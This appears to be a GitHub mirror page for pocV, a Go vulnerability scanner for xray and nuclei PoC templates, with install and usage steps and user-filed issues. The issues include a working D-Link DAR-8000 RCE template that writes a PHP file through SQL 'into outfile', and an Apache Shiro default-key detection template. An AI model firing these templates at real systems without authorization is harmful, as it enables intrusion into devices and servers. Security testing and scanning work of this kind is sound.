way29 / pocv Goto Github PK

View Code? Open in Web Editor NEW

187.0 4.0 25.0 185 KB

Compatible with xray and nuclei poc framework

License: MIT License

Go 100.00%

pocv's Introduction

pocV

一个兼容xray V2 poc和nuclei的poc扫描框架，某知识星球作业(A compatible with xray and nuclei poc framework)

Feature

支持请求缓存，加快请求速度 (Support request caching to speed up requests)
支持ceye.io和dnslog.cn作为反连平台 (Support ceye.io and dnslog.cn as dns platform)
支持tag子命令为xray/nuclei的poc添加/删除tag，tag可用于筛选poc (supports tag subcommand to add/remove tags for the xray/nucleis poc, and tag can be used to filter poc)
支持update子命令实现自我更新 (Support update subcommand to self-update)

Short

代码未经过大量测试，仅供学习 (The code is not heavily tested, just for learning)

TODO

xrayV2 http poc
xrayV2 tcp/udp poc
nuclei
使用tag筛选poc (Filter the poc through tags)

Reference

Install

github

# install pocV
git clone --recurse-submodules https://github.com/WAY29/pocV
go build  -ldflags "-w -s" ./cmd/pocV/
# update all pocs
git submodule update --remote --recursive
# self-update
pocV update

release

# download releases from https://github.com/WAY29/pocV/releases
# ...
# clone pocs 
git clone https://github.com/projectdiscovery/nuclei-templates && git clone https://github.com/chaitin/xray
# update pocs
cd ./nuclei-templates && git pull && cd ../xray && git pull
# self-update
pocV update

Usage / Quickstart

run

# run single poc
pocV run -t http://example.com -p ./pocs/test/xray/rule_test.yml
# run multiple pocs
pocV run -t http://example.com -P "./pocs/test/nuclei/*"
pocV run -t http://example.com -P "./pocs/nuclei/*"
pocV run -t http://example.com -P "./pocs/xray/pocs/*"
# Specify multiple targets
pocV run -T target.txt -p ./pocs/test/xray/rule_test.yml
# Filter the poc through tags
pocV run -T target.txt --tag test -p "./pocs/test/xray/*"

tag

# add tag
pocV tag -p ./pocs/test/nuclei/tag_test.yml newtag
# remove tag
pocV tag -p ./pocs/test/nuclei/tag_test.yml -r newtag

pocv's People

Contributors

Stargazers

Watchers

pocv's Issues

能否增加 webhook功能？

增加 webhook功能，对接微信、钉钉消息提醒

cel表达式执行错误panic

部分poc会报错 Evalaute expression error

content变量解析失败

poc文件如下

name: poc-yaml-dlink-dar8000-importhtml.php-rce
transport: http
set:
  filename: randomLowercase(8)
  # <?php echo md5(114514);?>
  content: select 0x3c3f706870206563686f206d643528313134353134293b3f3e into outfile '/usr/hddocs/nsg/app/{{filename}}.php'
  payload: base64(content)
rules:
  r1:
    request:
      cache: true
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql={{payload}}
      headers: {}
      follow_redirects: false
    expression: |
      response.status==200
  r2:
    request:
      cache: true
      method: GET
      path: /app/{{filename}}.php
      headers: {}
      body: ""
      follow_redirects: false
    expression: |
      response.status==200 && response.body.bcontains(bytes(md5("114514")))
expression: r1() && r2()
detail:
  author: name(link)
  links:
  - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/D-Link/D-Link%20DAR-8000%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  fingerprint:
    infos: []
    host_info:
      hostname: ""
  vulnerability:
    id: ""
    match: ""
  description: ""
  version: ""
  tags: test, test2

Can't parse poc error: : no template name field provided

error

payloads字段存在重复执行的问题

作者你好，我想问下我想在xray的poc下面实现shiro key检测

实现cel添加下面函数

			//shiro
			decls.NewFunction("shirokey",
				decls.NewOverload("shiro_key",
					[]*exprpb.Type{decls.String, decls.String},
					decls.String)),

			&functions.Overload{
				Operator: "shiro_key",
				Binary: func(key ref.Val, mode ref.Val) ref.Val {
					v1, ok := key.(types.String)
					if !ok {
						return types.ValOrErr(key, "unexpected type '%v' passed to shiro_key", key.Type())
					}
					v2, ok := mode.(types.String)
					if !ok {
						return types.ValOrErr(mode, "unexpected type '%v' passed to shiro_mode", mode.Type())
					}
					cookie := requests.GetShrioCookie(string(v1), string(v2))
					if cookie == "" {
						return types.NewErr("%v", "key b64decode failed")
					}
					return types.String(cookie)
				},
			},

测试poc如下所示

name: poc-yaml-apache-shiro-key
manual: true
transport: http
set:
  randstr: randomLowercase(8)
  shiromode1: printable("cbc")
  shiromode2: printable("gcm")
payloads:
  continue: false
  payloads:
    s1:
      key: shirokey("kPH+bIxk5D2deZiIxcaaaA==",shiromode1)
    s2:
      key: shirokey("2AvVhdsgUs0FSA3SDFAdag==",shiromode2)
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /
      follow_redirects: false
      headers:
        Cookie: JSESSIONID={{randstr}};rememberMe={{key}}
    expression: |
      !response.headers["Set-Cookie"].contains("rememberMe=")
expression: r0()
detail:
  author: shadown1ng(https://github.com/shadown1ng)

最终发现是数据包重复执行key: shirokey("kPH+bIxk5D2deZiIxcaaaA==",shiromode1)，如下图所示

第一个包

第二个包

短路逻辑Bug

按照短路逻辑，r1不应该被执行。这样会造成大量无意义的扫描请求

代码错误

师傅，这里写错了吧

不存在某请求头就匹配

xray中支持response.headers["X-Forwarded-For"] == ""的写法，pocV不支持，有推荐写法或者能支持一下吗

Error while running the program with nuclei or mutliple templates

Hey,

Thanks for releasing new tools. However while running pocV, I got the following errors.

[18:14]  WARN No Ceye api, use dnslog.cn
[18:14] DEBUG Load poc file: pocs/nuclei/cves/2020/CVE-2020-26153.yaml
panic: gcache: Cache size <= 0 [recovered]
        panic: gcache: Cache size <= 0

goroutine 1 [running]:
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc000696840, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:39 +0xa5
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006968a0, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c0090, {0x111fe80, 0x18a9900})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).callDo.func1()
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:52 +0x5a
panic({0x111fe80, 0x18a9900})
        /opt/hostedtoolcache/go/1.17.7/x64/src/runtime/panic.go:1038 +0x215
github.com/bluele/gcache.(*CacheBuilder).Build(...)
        /home/runner/go/pkg/mod/github.com/bluele/[email protected]/cache.go:157
github.com/WAY29/pocV/pkg/xray/requests.InitCache(0x23cd080)
        /home/runner/work/pocV/pocV/pkg/xray/requests/cache.go:18 +0xd1
main.cmdRun.func1()
        /home/runner/work/pocV/pocV/cmd/pocV/pocV.go:118 +0x2b3
github.com/jawher/mow.cli/internal/flow.(*Step).callDo(0xc00029fb88, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:55 +0x77
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c00c0, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:25 +0x31
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc0006c0060, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc000696870, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow.cli/internal/flow.(*Step).Run(0xc00029fef0, {0x0, 0x0})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/internal/flow/flow.go:29 +0x8e
github.com/jawher/mow%2ecli.(*Cmd).parse(0xc0001bfc00, {0xc00003c090, 0x3, 0x1}, 0x1, 0xc000696870, 0xc0006968a0)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/commands.go:693 +0x4fa
github.com/jawher/mow%2ecli.(*Cmd).parse(0xc0001bfa00, {0xc00003c080, 0x30, 0x239d500}, 0xc000611b60, 0xc00029fef0, 0xc000696840)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/commands.go:707 +0x75d
github.com/jawher/mow%2ecli.(*Cli).parse(0xc00063b070, {0xc00003c080, 0x6, 0x6}, 0xc0001bfa00, 0x134055f, 0x9)
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/cli.go:76 +0x9f
github.com/jawher/mow%2ecli.(*Cli).Run(0xc00063b070, {0xc00003c070, 0x7, 0x7})
        /home/runner/go/pkg/mod/github.com/jawher/[email protected]/cli.go:105 +0x117
main.main()
        /home/runner/work/pocV/pocV/cmd/pocV/pocV.go:151 +0x1e5

run multiple pocs error

./pocV run -t http://example.com -P /root/pocV/xray/pocs/*
./pocV run -t http://example.com -p /root/pocV/xray/pocs/*

反连poc误报

在Window下不存在误报，但是在linux下，扫描本地为例，这几个poc恒存在：